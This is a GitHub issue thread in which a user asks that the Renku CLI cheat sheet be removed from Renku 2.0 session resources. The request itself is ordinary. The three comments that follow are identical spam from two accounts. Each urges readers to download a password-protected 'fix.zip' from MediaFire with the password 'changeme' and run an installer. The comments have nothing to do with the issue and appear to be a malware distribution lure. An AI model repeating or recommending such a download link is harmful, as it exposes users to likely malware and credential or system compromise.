### ISSUE TITLE
Remove cheat sheet for the Renku CLI in Renku 2.0

### ISSUE THREAD

**Issue by andre-code** [SwissDataScienceCenter/renku-ui#3282]
## Motivation
When I go to Resources in a Renku 2.0 session, I see the cheat sheet for the Renku CLI (this should be removed)

## Proposal
Remove cheat sheet for the Renku CLI in Renku 2.0

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
